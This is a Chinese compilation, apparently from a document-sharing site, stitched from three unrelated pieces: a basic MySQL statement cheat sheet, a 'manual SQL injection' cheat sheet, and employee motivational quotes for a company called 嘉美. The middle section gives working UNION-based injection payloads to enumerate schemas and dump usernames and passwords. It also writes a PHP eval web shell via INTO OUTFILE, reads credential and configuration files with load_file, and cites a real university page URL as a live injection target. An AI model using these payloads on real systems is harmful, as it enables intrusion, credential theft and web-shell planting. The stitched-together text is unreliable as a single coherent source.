MySQL 经典语句总结
(侯惠阳 PHPer.yang)
SELECT
SELECT 列名称 FROM 表名称
SELECT LastName,FirstName FROM Persons
SELECT * FROM Persons
SELECT DISTINCT 列名称 FROM 表名称
SELECT DISTINCT Company FROM Orders //去除重复的distinct
WHERE
SELECT 列名称 FROM 表名称 WHERE 列 运算符 值
SELECT * FROM Persons WHERE City='Beijing'
SELECT * FROM Persons WHERE Year>1965
INSERT INTO
INSERT INTO 表名称 VALUES (值1, 值2,....)
INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)
INSERT INTO Persons VALUES ('Gates', 'Bill', 'Xuanwumen 10', 'Beijing')
INSERT INTO Persons (LastName, Address) VALUES ('Wilson', 'Champs-Elysees')
Insert into table () select * from name; //直接读取数据插入数据
Update
UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值
UPDATE Person SET FirstName = 'Fred' WHERE LastName = 'Wilson'
UPDATE Person SET Address = 'Zhongshan 23', City = 'Nanjing'
WHERE LastName = 'Wilson'
DELETE
DELETE FROM 表名称 WHERE 列名称 = 值
DELETE FROM Person WHERE LastName = 'Wilson'
DELETE FROM table_name
ORDER BY
SELECT Company, OrderNumber FROM Orders ORDER BY Company
SELECT Company, OrderNumber FROM Orders ORDER BY Company, OrderNumber SELECT Company, OrderNumber FROM Orders ORDER BY Company DESC
SELECT Company, OrderNumber FROM Orders ORDER BY Company DESC, OrderNumber ASC
AND & OR
SELECT * FROM Persons WHERE FirstName='Thomas' AND LastName='Carter'
SELECT * FROM Persons WHERE firstname='Thomas' OR lastname='Carter'
SELECT * FROM Persons WHERE (FirstName='Thomas' OR FirstName='William')
AND LastName='Carter'
IN
SELECT 列名称 FROM 表名称 WHERE 列名称 IN (值1,值2,..)
SELECT * FROM Persons WHERE LastName IN ('Adams','Gates')
BETWEEN ... AND
SELECT 列名称 FROM 表名称 WHERE 列名称 BETWEEN 值1 AND 值2
SELECT * FROM Persons WHERE LastName BETWEEN 'Adams' AND 'Carter'
SELECT * FROM Persons WHERE LastName NOT BETWEEN 'Adams' AND 'Carter'
Alias
SELECT 列名称 AS 列的别名 FROM 表名称
SELECT 列名称 FROM 表名称 AS 表的别名
SELECT LastName AS Family, FirstName AS Name FROM Persons
SELECT LastName, FirstName FROM Persons AS Employees
Join
SELECT * FROM tx1 left join (tx2, tx3) ON (tx1.id=tx2.tid AND tx2.tid=tx3.tid) where tx1.id = 3
SELECT * FROM t1 LEFT JOIN (t2, t3, t4)
ON (t2.a=t1.a AND t3.b=t1.b AND t4.c=t1.c)
等价于:
SELECT * FROM t1 LEFT JOIN (t2 CROSS JOIN t3 CROSS JOIN t4)
ON (t2.a=t1.a AND t3.b=t1.b AND t4.c=t1.c)
在MySQL中,CROSS JOIN语法上等价于INNER JOIN (它们可以彼此代替。在标准SQL中,它们不等价。INNER JOIN结合ON子句使用;CROSS JOIN 用于其它地方。 SELECT Employees.Name, Orders.Product FROM Employees, Orders
WHERE Employees.Employee_ID = Orders.Employee_ID
SELECT Employees.Name
FROM Employees, Orders
WHERE Employees.Employee_ID = Orders.Employee_ID
AND Orders.Product = 'Printer'
SELECT 字段1, 字段2, 字段3
FROM 第一个表
INNER JOIN 第二个表
ON 第一个表.keyfield = 第二个表.foreign_keyfield
SELECT Employees.Name, Orders.Product
FROM Employees
INNER JOIN Orders
ON Employees.Employee_ID=Orders.Employee_ID
SELECT field1, field2, field3
FROM first_table
LEFT JOIN second_table
ON first_table.keyfield = second_table.foreign_keyfield
SELECT Employees.Name, Orders.Product
FROM Employees
LEFT JOIN Orders
ON Employees.Employee_ID=Orders.Employee_ID
SELECT field1, field2, field3
FROM first_table
RIGHT JOIN second_table
ON first_table.keyfield = second_table.foreign_keyfield
SELECT Employees.Name, Orders.Product
FROM Employees
RIGHT JOIN Orders
ON Employees.Employee_ID=Orders.Employee_ID
SELECT Employees.Name
FROM Employees
INNER JOIN Orders
ON Employees.Employee_ID=Orders.Employee_ID
WHERE Orders.Product = 'Printer'
cross join :笛卡尔交集。
Inner join :内连接。
left join :只要满足左边表的需求就可以了,右表有无都可以。
right join :只要满足右表的需求就可以了,左表有无都可以。
UNION
SQL Statement 1
UNION
SQL Statement 2
注意:查看一样的字段,union 是将两个结果集并在一起,筛选出重复的数据, union all 只是简单的将两个结果结果合并,但是union all 比union 快。
SELECT E_Name FROM Employees_China
UNION
SELECT E_Name FROM Employees_USA
SQL Statement 1
UNION ALL
SQL Statement 2
Create
CREATE DATABASE 数据库名称
CREATE TABLE 表名称
(
列名称1 数据类型,
列名称2 数据类型,
.......
)
CREATE TABLE Person
(
LastName varchar,
FirstName varchar,
Address varchar,
Age int
)
CREATE TABLE Person
(
LastName varchar(30),
FirstName varchar,
Address varchar,
Age int(3)
)
CREATE UNIQUE INDEX 索引名称
ON 表名称 (列名称)
CREATE INDEX 索引名称
ON 表名称 (列名称)
CREATE INDEX PersonIndex
ON Person (LastName)
CREATE INDEX PersonIndex
ON Person (LastName DESC)
CREATE INDEX PersonIndex
ON Person (LastName, FirstName)
Drop
DROP INDEX index_name ON table_name
DROP TABLE 表名称
DROP DATABASE 数据库名称
TRUNCATE TABLE 表名称
ALTER TABLE
ALTER TABLE 表名称 ADD 列名称 数据类型
ALTER TABLE 表名称 DROP COLUMN 列名称
ALTER TABLE Person ADD City varchar(30)
ALTER TABLE Person DROP COLUMN Address
FUNCTIONS
SELECT function(列) FROM 表
GROUP BY 以及 HAVING
SELECT column,SUM(column) FROM table GROUP BY column
SELECT Company,SUM(Amount) FROM Sales
GROUP BY Company
SELECT column,SUM(column) FROM table
GROUP BY column
HAVING SUM(column) condition value
SELECT Company,SUM(Amount) FROM Sales
GROUP BY Company
HAVING SUM(Amount)>10000
SELECT INTO
SELECT column_name(s) INTO newtable [IN externaldatabase] FROM source
SELECT * INTO Persons_backup FROM Persons
SELECT LastName,Firstname INTO Persons_backup
FROM Persons
WHERE City='Sandnes'
Create View
CREATE VIEW 视图名称 AS SELECT 列名称 FROM 表名称 WHERE 条件
CREATE VIEW [Current Product List] AS
SELECT ProductID,ProductName
FROM Products
WHERE Discontinued=No
CREATE VIEW [Products Above Average Price] AS
SELECT ProductName,UnitPrice
FROM Products
WHERE UnitPrice>(SELECT AVG(UnitPrice) FROM Products)
SELECT * FROM [Current Product List]
CREATE VIEW [Category Sales For 1997] AS
SELECT DISTINCT CategoryName,Sum(ProductSales) AS CategorySales
FROM [Product Sales for 1997]
GROUP BY CategoryName
SELECT * FROM [Category Sales For 1997]
WHERE CategoryName='Beverages'
正则匹配:
SELECT 列 FROM 表 WHERE 列 LIKE 模式
SELECT * FROM Persons WHERE FirstName LIKE 'B%'
SELECT * FROM Persons WHERE FirstName LIKE '%s'
SELECT * FROM Persons WHERE FirstName LIKE '%eo%'
SELECT * FROM Persons WHERE FirstName LIKE '___h' (下划线表示三个字符,表示匹配前面有三个字符最后面是h)
SELECT * FROM Persons WHERE FirstName LIKE [houhuiyang]; (匹配[]里面的所有字符) SELECT * FROM Persons WHERE FirstName LIKE [a-zA-Z]; (匹配[]里面小写a到z大写的A-Z)
SELECT * FROM Persons WHERE FirstName REGEXP ‘^[houhuiyang]’;(匹配正则表达式的内容)
第二篇:MySQL 手工注入语句总结
MySQL 手工注入语句总结:存查备用!
暴字段长度
Order by num/*
匹配字段
and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*
利用内置函数暴数据库信息
version() database() user()
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
暴库 (mysql>5.0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where
TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
直接写马(Root权限)
条件:
1、知道站点物理路径
2、有足够大的权限(可以用select ?. from mysql.user测试)
3、magic_quotes_gpc()=OFF
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
and 1=2 union all select 一句话HEX值 into outfile '路径'
load_file() 常用路径:
1、replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
3、load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:\APACHE\Apache2\conf\httpd.conf
9、C:\Program Files\mysql\my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、usr/local/app/php5 b/php.ini PHP 的相当设置
17 、/etc/my.cnf MYSQL的配置文件
18、 /etc/redhat-release 红帽子的系统版本
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24、c:\windows\my.ini
25、c:\boot.ini
网站常用配置文件
config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
注:
Char(60)表示 <
Char(32)表示 空格
手工注射时出现的问题:
当注射后页面显示:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
如:http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
这是由于前后编码不一致造成的,
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
既可以继续注射了。。。
第三篇:工作总结经典语录
20xx工作总结经典语录
我会每天给自己定一个工作计划,然后去认真完成自己定的任务,每
天都会如此。因为我想改变所以我相信一定会达到自己想要的结果,
嘉美是我事业平台的起点,我愿意在这个平台上和兄弟姐妹们一起共
创人生的辉煌!
文洋
我已经拥有了自己的会员,我也做出了自己的业绩,我相信我一定
有能力把这份工作做好。我时时告诫自己“如果让我贫穷我不愿意,
如果让我放弃我不愿意,如果让我不如别人我更不愿意”!
李铭
既然我选择了这份工作,我就一定要把它做好。如果我做不好,我姑
且不谈对不起公司领导,我也对不起我自己的承诺和付出,我更对不
起生我养我的父母!
张萍
我既是父母亲的儿女,又是儿女的母亲。所以我知道我肩负的责任,
我要活在当下,活出精彩,活出价值,活出别人对我的喝彩! 何君
我要找回我进嘉美时的梦想,定下切实可行的计划,把工作落实到每
个环节,用行动来证明我的结果。我要做我人生的主角! 程翠萍
我以前没有目标,没有规划,不知道自己奋斗的方向。自从进了嘉美
我感受到了生活的乐趣,工作的激情,目标的伟大。我知道改变是痛
苦的不改变更痛苦,所以我愿意选择用短暂的痛苦来换取长久的快
乐。我相信任何困难都不可以把我击垮,因为我渴望成功!
小段
我不敢想过去,因为我失去的太多了,我假设自己就是一个操作工要
想不被人看不起那我就必须使劲往上爬。我决定从头开始从现在开
始,实实在在做好自己。我不能再仰头看别人了,我要让别人都仰头
看着我!
周丽娜
我曾经对自己的人生和目标没有规划,就像黑夜在大海上随波逐流的
小舟。而进了嘉美我感觉人生有了灯塔,我知道自己要什么,我更知
道自己该做什么。我相信我自己只要付出比别人更多的努力,我也一
定会超越别人,为了成功,我不放弃,我绝不放弃,我绝不绝不放弃!
小曹
20xx年对于我来讲是个不平凡的一年。在嘉美我学到了宝贵的人生经验,销售技巧,沟通能力和胆识。如果当初选择进厂,可能这些东西我要用五年的时间才能学到。转眼间,传说中的20xx到了,去年的一切都是浮云。今年刚开始,希望我们在新的起点,打起12分精神来应对这一切。头炮打响,响一年,齐心协力,积极应对!
龙英梅
“没有谁能够随随便便成功”亲爱的伙伴们,我相信嘉美的成功,赵总的成功,一定离不开大家的努力。同时嘉美也给了我们一个锻炼,学习,成长的平台。“心有多大,舞台就有多大”既然20xx不是世界末日,那就让我们一起在嘉美的舞台上为嘉美的成功,自己的成功而努力奋斗吧!!!
吴盛涛
给自己一个信仰、给自己一个方向、给自己一段时光,让我们携手共同学习、共同成长、一起进步!20xx寻志同者、生死同行、肝胆相照!
吴浩然
我喜欢嘉美事业平台,因为带给我更多的健康和快乐;我喜欢这帮孩子;因为带给我更多的激情和梦想。我愿意紧紧跟随赵总,紧密团结在姚总的周围,以饱满的热情,全力以赴的态度,和大家一起把嘉美事业推向一个新的高度,共创20xx年的辉煌!
朱老师
对于会所来说,老板及管理者只要照顾好自己的员工,员工才能照顾好自己的会员,会员自然会照顾好会所的生意,这就是会所健康发展的“铁三角”。
姚总 20xx-1-4